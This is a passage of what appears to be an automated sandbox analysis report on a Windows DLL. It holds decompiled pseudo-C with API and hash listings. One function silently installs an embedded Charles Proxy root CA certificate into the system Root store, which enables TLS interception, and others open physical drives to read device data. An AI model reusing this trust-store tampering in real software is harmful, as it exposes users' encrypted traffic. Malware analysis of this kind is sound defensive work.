				_v16 = "-----BEGIN CERTIFICATE-----\nMIIFTDCCBDSgAwIBAgIGAW3jTP9iMA0GCSqGSIb3DQEBCwUAMIGqMTswOQYDVQQD\nDDJDaGFybGVzIFByb3h5IENBICgxOSDljYHmnIggMjAxOSwgREVTS1RPUC1CTkFU\nMTFVKTElMCMGA1UECwwcaHR0cHM6Ly9jaGFybGVzcHJveHkuY29tL3NzbDERMA8G\nA1UECgwIWEs3MiBMdGQxETAPBgNVBAcMCEF1Y2tsYW5kMREwDwYDVQQIDAhBdWNr\nbGFuZDELMAkGA1UEBhMCTlowHhcNMDAwMTAxMDAwMDAwWhcNNDgxMjE1MDkxNTM3\nWjCBqjE7MDkGA1UEAwwyQ2hhcmxlcyBQcm94eSBDQSAoMTkg5Y2B5pyIIDIwMTks\nIERFU0tUT1AtQk5BVDExVSkxJTAjBgNVBAsMHGh0dHBzOi8vY2hhcmxlc3Byb3h5\nLmNvbS9zc2wxETAPBgNVBAoMCFhLNzIgTHRkMREwDwYDVQQHDAhBdWNrbGFuZDER\nMA8GA1UECAwIQXVja2xhbmQxCzAJBgNVBAYTAk5aMIIBIjANBgkqhkiG9w0BAQEF\nAAOCAQ8AMIIBCgKCAQEArobFBD7TTZn0T6MFLqNAR6f7vjMYix3CymRcoySeheVL\nSSHUmY/aaiIkfDLZCH10KvO/hQgDroweJfqtU/uP2CO3NT2aOsmSv5F/aTgmx5Dl\nOlQLEgtlU1COyVheRn0xC9Pvn7YXMd61Iut49D+CSzS+Nngtt6jLFizSIkexTkxa\n5jPtZlQjVKWZcb3cWRYOzcUhtEd8k8qeYk4K8AKYYCMA9dw2iBnDy58CYEY2iIJ2\ns6SYVwRztTKLCDTzJ8NCheMz2pIH4S8O27ZUyM8R48x8uhelLNfNQsEK4JWi5Oud\nPj82FIgkPwWEr0DnLW5uGCFJv7g0I4T2DxLhRzQljQIDAQABo4IBdDCCAXAwDwYD\nVR0TAQH/BAUwAwEB/zCCASwGCWCGSAGG+EIBDQSCAR0TggEZVGhpcyBSb290IGNl\ncnRpZmljYXRlIHdhcyBnZW5lcmF0ZWQgYnkgQ2hhcmxlcyBQcm94eSBmb3IgU1NM\nIFByb3h5aW5nLiBJZiB0aGlzIGNlcnRpZmljYXRlIGlzIHBhcnQgb2YgYSBjZXJ0\naWZpY2F0ZSBjaGFpbiwgdGhpcyBtZWFucyB0aGF0IHlvdSdyZSBicm93c2luZyB0\naHJvdWdoIENoYXJsZXMgUHJveHkgd2l0aCBTU0wgUHJveHlpbmcgZW5hYmxlZCBm\nb3IgdGhpcyB3ZWJzaXRlLiBQbGVhc2Ugc2VlIGh0dHA6Ly9jaGFybGVzcHJveHku\nY29tL3NzbCBmb3IgbW9yZSBpbmZvcm1hdGlvbi4wDgYDVR0PAQH/BAQDAgIEMB0G\nA1UdDgQWBBT40NxUNnz3lAIPi5J4Ol2KkSUfnzANBgkqhkiG9w0BAQsFAAOCAQEA\nZiJx651cdEyIOC3pi6NzIOYxIQTQQnOpIAeoZwl21lMOY0fQC73tExm7Z1TzYjdZ\nYJWSKRHjZhpwNU9roLeXp2JYvnreu4yNvu7Zd3YLgCcddLJETZL2wTN6N5tzVFsl\nHeX4gSuWJau7+u3BX4xsN0ubJt0P7wNRhfWJnYgZ5oncbbXwurv9Y3xSsb7IARW4\nifru1JPUES10SVStOr5mB8QaSi1le6Mw7RMfpOjCW7KO4YHc742pHBe/0wojyOro\nGxUu2F/5OK/DKzT/2v+9ty2bsEBnv8h/V566ljexZeoAjqdAi8gmXzPAOb9g9QbS\nRaa1MBevyOFh1w7VsNdldg==\n-----END CERTIFICATE-----\n";
				_v24 = 0;
				_v8 = 0;
				_v28 = 0;
				_v12 = 0;
				if(CryptStringToBinaryA(_v16, 0, 0, 0,  &_v12, 0, 0) != 0 && _v12 > 0) {
					_t66 = L1000CE56(__ebx, _v12, __edi, __esi, _v12);
					_t122 = _t121 + 4;
					_v20 = _t66;
					_t133 = _v20;
					if(_v20 != 0) {
						CryptStringToBinaryA(_v16, 0, 0, _v20,  &_v12, 0, 0);
						_t69 = _v12;
						__imp__CertCreateCertificateContext(1, _v20, _t69); // executed
						_v8 = _t69;
						_push(_v20);
						_t70 = E1000CA30(__ebx, __edi, __esi, _t133);
						_t123 = _t122 + 4;
						if(_v8 != 0) {
							__imp__CertOpenStore(0xa, 0, 0, 0x24000, L"Root"); // executed
							_v28 = _t70;
							if(_v28 != 0) {
								_t71 = _v8;
								__imp__CertAddCertificateContextToStore(_v28, _t71, 1, 0); // executed
								if(_t71 == 0) {
									_t72 = GetLastError();
									__eflags = _t72 - 0x80092005;
									if(_t72 == 0x80092005) {
										_v36 = 0;
										_v32 = 0;
										__imp__CertGetCertificateContextProperty(_v8, 3, 0,  &_v36);
										__eflags = _v36;
										if(_v36 > 0) {
											_t75 = L1000CE56(__ebx,  &_v36, __edi, __esi, _v36 + 1);
											_t124 = _t123 + 4;
											_v32 = _t75;
											__eflags = _v32;
											if(_v32 != 0) {
												E1000CF20(_t118, _v32, 0, _v36 + 1);
												__imp__CertGetCertificateContextProperty(_v8, 3, _v32,  &_v36);
												_v564 = 0;
												E1000CF20(_t118,  &_v563, 0, 0x103);
												_v300 = 0;
												E1000CF20(_t118,  &_v299, 0, 0x103);
												_t127 = _t124 + 0x24;
												_v568 = 0;
												while(1) {
													__eflags = _v568 - _v36;
													if(_v568 >= _v36) {
														break;
													}
													E1000CC93(_t118, _t120 + _v568 * 2 - 0x128, "%02X",  *(_v32 + _v568) & 0x000000ff);
													_t127 = _t127 + 0xc;
													_t90 = _v568 + 1;
													__eflags = _t90;
													_v568 = _t90;
												}
												E1000CC93(_t118,  &_v564, "Software\\Microsoft\\SystemCertificates\\Root\\Certificates\\%s",  &_v300);
												_v24 = E1001F680(_a8, __eflags, 0x80000002,  &_v564, _a4, _a8);
												_push(_v32);
												E1000CA30(_t91, _t118, _t119, __eflags);
											}
										}
									}
								} else {
									_v24 = 1;
								}
								__imp__CertCloseStore(_v28, 1);
							}
							__imp__CertFreeCertificateContext(_v8);
						}
					}
				}
				return _v24;
			}






























                                                                                                                                                      0x1001f720
                                                                                                                                                      0x1001f720
                                                                                                                                                      0x1001f720
                                                                                                                                                      0x1001f729
                                                                                                                                                      0x1001f730
                                                                                                                                                      0x1001f737
                                                                                                                                                      0x1001f73e
                                                                                                                                                      0x1001f745
                                                                                                                                                      0x1001f766
                                                                                                                                                      0x1001f77a
                                                                                                                                                      0x1001f77f
                                                                                                                                                      0x1001f782
                                                                                                                                                      0x1001f785
                                                                                                                                                      0x1001f789
                                                                                                                                                      0x1001f7a3
                                                                                                                                                      0x1001f7a9
                                                                                                                                                      0x1001f7b3
                                                                                                                                                      0x1001f7b9
                                                                                                                                                      0x1001f7bf
                                                                                                                                                      0x1001f7c0
                                                                                                                                                      0x1001f7c5
                                                                                                                                                      0x1001f7cc
                                                                                                                                                      0x1001f7e2
                                                                                                                                                      0x1001f7e8
                                                                                                                                                      0x1001f7ef
                                                                                                                                                      0x1001f7f9
                                                                                                                                                      0x1001f801
                                                                                                                                                      0x1001f809
                                                                                                                                                      0x1001f817
                                                                                                                                                      0x1001f81d
                                                                                                                                                      0x1001f822
                                                                                                                                                      0x1001f828
                                                                                                                                                      0x1001f82f
                                                                                                                                                      0x1001f842
                                                                                                                                                      0x1001f848
                                                                                                                                                      0x1001f84c
                                                                                                                                                      0x1001f859
                                                                                                                                                      0x1001f85e
                                                                                                                                                      0x1001f861
                                                                                                                                                      0x1001f864
                                                                                                                                                      0x1001f868
                                                                                                                                                      0x1001f87b
                                                                                                                                                      0x1001f891
                                                                                                                                                      0x1001f897
                                                                                                                                                      0x1001f8ac
                                                                                                                                                      0x1001f8b4
                                                                                                                                                      0x1001f8c9
                                                                                                                                                      0x1001f8ce
                                                                                                                                                      0x1001f8d1
                                                                                                                                                      0x1001f8ec
                                                                                                                                                      0x1001f8f2
                                                                                                                                                      0x1001f8f5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001f91c
                                                                                                                                                      0x1001f921
                                                                                                                                                      0x1001f8e3
                                                                                                                                                      0x1001f8e3
                                                                                                                                                      0x1001f8e6
                                                                                                                                                      0x1001f8e6
                                                                                                                                                      0x1001f939
                                                                                                                                                      0x1001f95d
                                                                                                                                                      0x1001f963
                                                                                                                                                      0x1001f964
                                                                                                                                                      0x1001f969
                                                                                                                                                      0x1001f868
                                                                                                                                                      0x1001f84c
                                                                                                                                                      0x1001f80b
                                                                                                                                                      0x1001f80b
                                                                                                                                                      0x1001f80b
                                                                                                                                                      0x1001f972
                                                                                                                                                      0x1001f972
                                                                                                                                                      0x1001f97c
                                                                                                                                                      0x1001f97c
                                                                                                                                                      0x1001f7cc
                                                                                                                                                      0x1001f789
                                                                                                                                                      0x1001f988

                                                                                                                                                      APIs
                                                                                                                                                      • CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F75E
                                                                                                                                                      • CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7A3
                                                                                                                                                      • CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F7B3
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      • CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F7E2
                                                                                                                                                      • CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F801
                                                                                                                                                      • GetLastError.KERNEL32 ref: 1001F817
                                                                                                                                                      • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F842
                                                                                                                                                      • _memset.LIBCMT ref: 1001F87B
                                                                                                                                                      • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F891
                                                                                                                                                      • _memset.LIBCMT ref: 1001F8AC
                                                                                                                                                      • _memset.LIBCMT ref: 1001F8C9
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001F91C
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001F939
                                                                                                                                                      • CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F972
                                                                                                                                                      • CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F97C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Cert$CertificateContext$Store_memset$BinaryCryptErrorFreeLastPropertyString_sprintf$CloseCreateHeapOpen___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID: %02X$Root$Software\Microsoft\SystemCertificates\Root\Certificates\%s
                                                                                                                                                      • API String ID: 3311258246-1857994723
                                                                                                                                                      • Opcode ID: 0ce81e6e7efad015fc66a7c972b9d95a9014d6efbbcb29acca2529cb5b9abefb
                                                                                                                                                      • Instruction ID: afe3fe35dc8e16d3553f6fe7244bb1c21b11eefa07642306de8368dfec16bcca
                                                                                                                                                      • Opcode Fuzzy Hash: 0ce81e6e7efad015fc66a7c972b9d95a9014d6efbbcb29acca2529cb5b9abefb
                                                                                                                                                      • Instruction Fuzzy Hash: 986133B5D00219BBEB10DB90CC99FFEB778EB48704F104598F605BA280D775AA85CFA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000E90E, Relevance: 25.6, APIs: 17, Instructions: 90memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                      			E1000E90E() {
				int _t13;
				long _t19;
				signed int _t20;
				signed int _t21;
				signed int _t22;
				signed int _t23;
				signed int _t27;
				signed int _t28;
				signed int _t32;
				signed int _t33;
				void* _t37;
				long _t39;
				void* _t40;
				signed int _t47;
				struct _OSVERSIONINFOA* _t49;
				void* _t51;

				_t37 = GetProcessHeap;
				_t49 = HeapAlloc(GetProcessHeap(), 0, 0x94);
				if(_t49 != 0) {
					_t49->dwOSVersionInfoSize = 0x94;
					_t13 = GetVersionExA(_t49);
					__eflags = _t13;
					_push(_t49);
					_push(0);
					if(_t13 != 0) {
						 *(_t51 + 0xc) = _t49->dwPlatformId;
						 *(_t51 + 0x10) = _t49->dwMajorVersion;
						 *(_t51 - 4) = _t49->dwMinorVersion;
						_t47 = _t49->dwBuildNumber & 0x00007fff;
						HeapFree(GetProcessHeap(), ??, ??);
						_t19 =  *(_t51 + 0xc);
						__eflags = _t19 - 2;
						if(_t19 != 2) {
							_t47 = _t47 | 0x00008000;
							__eflags = _t47;
						}
						_t39 =  *(_t51 - 4);
						 *0x1033347c = _t19;
						_t20 =  *(_t51 + 0x10);
						_t44 = (_t20 << 8) + _t39;
						 *0x10333484 = (_t20 << 8) + _t39;
						 *0x10333488 = _t20;
						 *0x1033348c = _t39;
						 *0x10333480 = _t47;
						_t21 = E1000F7BF(1);
						__eflags = _t21;
						_pop(_t40);
						if(_t21 == 0) {
							goto L1;
						} else {
							_t23 = E100133E0(_t37);
							__eflags = _t23;
							if(_t23 != 0) {
								E10015081();
								 *0x10336f64 = GetCommandLineA();
								 *0x103332fc = E10014F4C(); // executed
								_t27 = E10014994(_t37, _t44, _t47, _t49, __eflags); // executed
								__eflags = _t27;
								if(_t27 >= 0) {
									_t28 = E10014E93(_t40);
									__eflags = _t28;
									if(_t28 < 0) {
										L15:
										E10014BD4();
										goto L10;
									} else {
										_t32 = E10014C20(_t40, _t44);
										__eflags = _t32;
										if(_t32 < 0) {
											goto L15;
										} else {
											_t33 = E1001167A(_t37, _t47, _t49, _t51, 0);
											__eflags = _t33;
											if(_t33 != 0) {
												goto L15;
											} else {
												 *0x103332f8 =  *0x103332f8 + 1;
												_t22 = 1;
												__eflags = 1;
											}
										}
									}
								} else {
									L10:
									E100130CA();
									goto L8;
								}
							} else {
								L8:
								E1000F819();
								goto L1;
							}
						}
					} else {
						HeapFree(GetProcessHeap(), ??, ??);
						goto L1;
					}
				} else {
					L1:
					_t22 = 0;
				}
				return _t22;
			}



















                                                                                                                                                      0x1000e90e
                                                                                                                                                      0x1000e925
                                                                                                                                                      0x1000e929
                                                                                                                                                      0x1000e933
                                                                                                                                                      0x1000e935
                                                                                                                                                      0x1000e93b
                                                                                                                                                      0x1000e93d
                                                                                                                                                      0x1000e93e
                                                                                                                                                      0x1000e940
                                                                                                                                                      0x1000e953
                                                                                                                                                      0x1000e959
                                                                                                                                                      0x1000e95f
                                                                                                                                                      0x1000e962
                                                                                                                                                      0x1000e96b
                                                                                                                                                      0x1000e971
                                                                                                                                                      0x1000e974
                                                                                                                                                      0x1000e977
                                                                                                                                                      0x1000e979
                                                                                                                                                      0x1000e979
                                                                                                                                                      0x1000e979
                                                                                                                                                      0x1000e97f
                                                                                                                                                      0x1000e982
                                                                                                                                                      0x1000e987
                                                                                                                                                      0x1000e98f
                                                                                                                                                      0x1000e993
                                                                                                                                                      0x1000e999
                                                                                                                                                      0x1000e99e
                                                                                                                                                      0x1000e9a4
                                                                                                                                                      0x1000e9aa
                                                                                                                                                      0x1000e9af
                                                                                                                                                      0x1000e9b1
                                                                                                                                                      0x1000e9b2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000e9b8
                                                                                                                                                      0x1000e9b8
                                                                                                                                                      0x1000e9bd
                                                                                                                                                      0x1000e9bf
                                                                                                                                                      0x1000e9cb
                                                                                                                                                      0x1000e9d6
                                                                                                                                                      0x1000e9e0
                                                                                                                                                      0x1000e9e5
                                                                                                                                                      0x1000e9ea
                                                                                                                                                      0x1000e9ec
                                                                                                                                                      0x1000e9f5
                                                                                                                                                      0x1000e9fa
                                                                                                                                                      0x1000e9fc
                                                                                                                                                      0x1000ea1e
                                                                                                                                                      0x1000ea1e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000e9fe
                                                                                                                                                      0x1000e9fe
                                                                                                                                                      0x1000ea03
                                                                                                                                                      0x1000ea05
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ea07
                                                                                                                                                      0x1000ea09
                                                                                                                                                      0x1000ea0e
                                                                                                                                                      0x1000ea11
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ea13
                                                                                                                                                      0x1000ea13
                                                                                                                                                      0x1000eacc
                                                                                                                                                      0x1000eacc
                                                                                                                                                      0x1000eacc
                                                                                                                                                      0x1000ea11
                                                                                                                                                      0x1000ea05
                                                                                                                                                      0x1000e9ee
                                                                                                                                                      0x1000e9ee
                                                                                                                                                      0x1000e9ee
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000e9ee
                                                                                                                                                      0x1000e9c1
                                                                                                                                                      0x1000e9c1
                                                                                                                                                      0x1000e9c1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000e9c1
                                                                                                                                                      0x1000e9bf
                                                                                                                                                      0x1000e942
                                                                                                                                                      0x1000e945
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000e945
                                                                                                                                                      0x1000e92b
                                                                                                                                                      0x1000e92b
                                                                                                                                                      0x1000e92b
                                                                                                                                                      0x1000e92b
                                                                                                                                                      0x1000ead1

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$Process$Free$AllocCommandEnvironmentInitializeLineStringsVersion___crt__cinit__heap_term__ioinit__ioterm__mtterm__setargv__setenvp
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2870529951-0
                                                                                                                                                      • Opcode ID: 6c4bbaa7a2ed88e341af398c15252e428cac03d6031402dac072d6ceb804dc07
                                                                                                                                                      • Instruction ID: 130607f004240c79eb30421efa65504882722ed8364210b240487f0131cf44a3
                                                                                                                                                      • Opcode Fuzzy Hash: 6c4bbaa7a2ed88e341af398c15252e428cac03d6031402dac072d6ceb804dc07
                                                                                                                                                      • Instruction Fuzzy Hash: 05317F75A043919BF750EFB2888175A77E8EF48381F21C429E909DA356EB34EC418B61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001D7E0, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                      			E1001D7E0(void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				signed short* _v44;
				void* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				char _v570;
				short _v572;
				char _v1596;
				void* _v1600;
				char _v1604;
				long _v1608;
				signed int _v1612;
				void* _v1616;
				void* _v1620;
				void* _v1624;
				void* _v1628;
				void* _v1632;
				signed int _v1633;
				void _v1636;
				char _v2148;
				char _v2164;
				void* _t73;
				int _t78;
				void* _t88;
				void* _t94;
				void* _t123;
				void* _t124;

				_t123 = __edi;
				_v52 = _a4;
				if(_a4 == 0) {
					L18:
					return 0;
				}
				_v1600 = 0;
				_v1612 = 0;
				while(1 != 0) {
					_v572 = 0;
					E1000CF20(_t123,  &_v570, 0, 0x1fe);
					wsprintfW( &_v572, L"\\\\.\\PhysicalDrive%d", _v1612);
					_t124 = _t124 + 0x18;
					_t73 = CreateFileW( &_v572, 0xc0000000, 3, 0, 3, 0, 0); // executed
					_v48 = _t73;
					if(_v48 == 0xffffffff) {
						L15:
						_v1612 = 1 + _v1612;
						if(_v1612 < 4) {
							continue;
						}
						return _v1600;
					}
					_v1608 = 0;
					_v1636 = 0;
					_v1632 = 0;
					_v1628 = 0;
					_v1624 = 0;
					_v1620 = 0;
					_v1616 = 0;
					_t78 = DeviceIoControl(_v48, 0x74080, 0, 0,  &_v1636, 0x18,  &_v1608, 0); // executed
					if(_t78 == 0) {
						CloseHandle(_v48);
						goto L15;
					}
					if((_v1633 & 0x000000ff) == 0) {
						L11:
						CloseHandle(_v48);
						if(_v1600 == 0) {
							goto L15;
						}
						return _v1600;
					}
					asm("sbb edx, edx");
					_v1604 = ( ~((_v1633 & 0x000000ff) >> _v1612 & 0x00000010) & 0xffffffb5) + 0xec;
					_v40 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					_v24 = 0;
					_v20 = 0;
					_v16 = 0;
					_v12 = 0;
					_v8 = 0;
					E1000CF20(_t123,  &_v2164, 0, 0x210);
					_t88 = E1001CF20( &_v40, _v1612, _v48,  &_v2164, _v1604,  &_v1608);
					_t124 = _t124 + 0x24;
					if(_t88 == 0) {
						goto L11;
					}
					_v60 =  &_v1596;
					_v44 =  &_v2148;
					do {
						 *_v60 =  *_v44 & 0x0000ffff;
						_v44 =  &(_v44[1]);
						_v60 =  &(_v60[1]);
					} while (_v44 <  &_v1636);
					_v56 = E1001CD70( &_v1596);
					_t94 = E1001CFA0(_v56, 0x104, _v52);
					_t124 = _t124 + 0x10;
					if(_t94 == 0) {
						_v1600 = 1;
					}
					goto L11;
				}
				goto L18;
			}







































                                                                                                                                                      0x1001d7e0
                                                                                                                                                      0x1001d7ec
                                                                                                                                                      0x1001d7f3
                                                                                                                                                      0x1001da64
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001da64
                                                                                                                                                      0x1001d7f9
                                                                                                                                                      0x1001d803
                                                                                                                                                      0x1001d80d
                                                                                                                                                      0x1001d81a
                                                                                                                                                      0x1001d831
                                                                                                                                                      0x1001d84c
                                                                                                                                                      0x1001d852
                                                                                                                                                      0x1001d86b
                                                                                                                                                      0x1001d871
                                                                                                                                                      0x1001d878
                                                                                                                                                      0x1001da3d
                                                                                                                                                      0x1001da4c
                                                                                                                                                      0x1001da55
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001da5f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001da57
                                                                                                                                                      0x1001d87e
                                                                                                                                                      0x1001d888
                                                                                                                                                      0x1001d892
                                                                                                                                                      0x1001d89c
                                                                                                                                                      0x1001d8a6
                                                                                                                                                      0x1001d8b0
                                                                                                                                                      0x1001d8ba
                                                                                                                                                      0x1001d8e3
                                                                                                                                                      0x1001d8eb
                                                                                                                                                      0x1001da37
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001da37
                                                                                                                                                      0x1001d8fa
                                                                                                                                                      0x1001da16
                                                                                                                                                      0x1001da1a
                                                                                                                                                      0x1001da27
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001da31
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001da29
                                                                                                                                                      0x1001d914
                                                                                                                                                      0x1001d91f
                                                                                                                                                      0x1001d925
                                                                                                                                                      0x1001d92c
                                                                                                                                                      0x1001d933
                                                                                                                                                      0x1001d93a
                                                                                                                                                      0x1001d941
                                                                                                                                                      0x1001d948
                                                                                                                                                      0x1001d94f
                                                                                                                                                      0x1001d956
                                                                                                                                                      0x1001d95d
                                                                                                                                                      0x1001d96f
                                                                                                                                                      0x1001d99b
                                                                                                                                                      0x1001d9a0
                                                                                                                                                      0x1001d9a5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d9ad
                                                                                                                                                      0x1001d9b6
                                                                                                                                                      0x1001d9b9
                                                                                                                                                      0x1001d9c2
                                                                                                                                                      0x1001d9ca
                                                                                                                                                      0x1001d9d3
                                                                                                                                                      0x1001d9dc
                                                                                                                                                      0x1001d9f0
                                                                                                                                                      0x1001da00
                                                                                                                                                      0x1001da05
                                                                                                                                                      0x1001da0a
                                                                                                                                                      0x1001da0c
                                                                                                                                                      0x1001da0c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001da0a
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001D831
                                                                                                                                                      • wsprintfW.USER32 ref: 1001D84C
                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D86B
                                                                                                                                                      • DeviceIoControl.KERNELBASE(000000FF,00074080,00000000,00000000,00000000,00000018,00000000,00000000), ref: 1001D8E3
                                                                                                                                                      • _memset.LIBCMT ref: 1001D96F
                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 1001DA1A
                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 1001DA37
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandle_memset$ControlCreateDeviceFilewsprintf
                                                                                                                                                      • String ID: \\.\PhysicalDrive%d
                                                                                                                                                      • API String ID: 381188756-2935326385
                                                                                                                                                      • Opcode ID: 228ac608f1b5d7182a6ce1183333a69992f212d465b9132994bd91ad4db78590
                                                                                                                                                      • Instruction ID: e843174948dd7abc5fb59b2edd762e96836351ae516af004f3d86572885adcf9
                                                                                                                                                      • Opcode Fuzzy Hash: 228ac608f1b5d7182a6ce1183333a69992f212d465b9132994bd91ad4db78590
                                                                                                                                                      • Instruction Fuzzy Hash: 21613DB1D04218ABEB20DF54CC95BDDB7B6EF84304F148199E509BB280D776AA94CF91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001DA70, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                      			E1001DA70(void* __edi, intOrPtr _a4) {
				struct _OVERLAPPED* _v8;
				struct _OVERLAPPED* _v12;
				void* _v16;
				short _v532;
				struct _OVERLAPPED* _v536;
				struct _OVERLAPPED* _v540;
				void _v544;
				long _v548;
				struct _OVERLAPPED* _v552;
				intOrPtr _v10532;
				void _v10556;
				char _v11556;
				void* _t43;
				int _t48;
				void* _t56;
				void* _t70;
				void* _t71;

				_t70 = __edi;
				E10018AA0(0x2d20);
				if(_a4 == 0) {
					L13:
					return 0;
				}
				_v8 = 0;
				_v12 = 0;
				_v552 = 0;
				while(1 != 0) {
					wsprintfW( &_v532, L"\\\\.\\PhysicalDrive%d", _v8);
					_t71 = _t71 + 0xc;
					_t43 = CreateFileW( &_v532, 0, 3, 0, 3, 0, 0); // executed
					_v16 = _t43;
					if(_v16 == 0xffffffff) {
						L10:
						_v8 =  &(_v8->Internal);
						_v552 = _v8;
						if(_v8 < 4) {
							continue;
						}
						return _v12;
					}
					_v548 = 0;
					_v536 = 0;
					_v544 = 0;
					_v540 = 0;
					E1000CF20(_t70,  &_v10556, 0, 0x2710);
					_t71 = _t71 + 0xc;
					_t48 = DeviceIoControl(_v16, 0x2d1400,  &_v544, 0xc,  &_v10556, 0x2710,  &_v548, 0); // executed
					if(_t48 != 0) {
						E1000CF20(_t70,  &_v11556, 0, 0x3e8);
						E1001D040(_v10532,  &_v10556,  &_v11556);
						_t56 = E1001CFA0( &_v11556, 0x104, _a4);
						_t71 = _t71 + 0x24;
						if(_t56 == 0) {
							_v12 = 1;
						}
					}
					FindCloseChangeNotification(_v16); // executed
					if(_v12 == 0) {
						_v8 = _v552;
						goto L10;
					} else {
						return _v12;
					}
				}
				goto L13;
			}




















                                                                                                                                                      0x1001da70
                                                                                                                                                      0x1001da78
                                                                                                                                                      0x1001da81
                                                                                                                                                      0x1001dbf0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001dbf0
                                                                                                                                                      0x1001da87
                                                                                                                                                      0x1001da8e
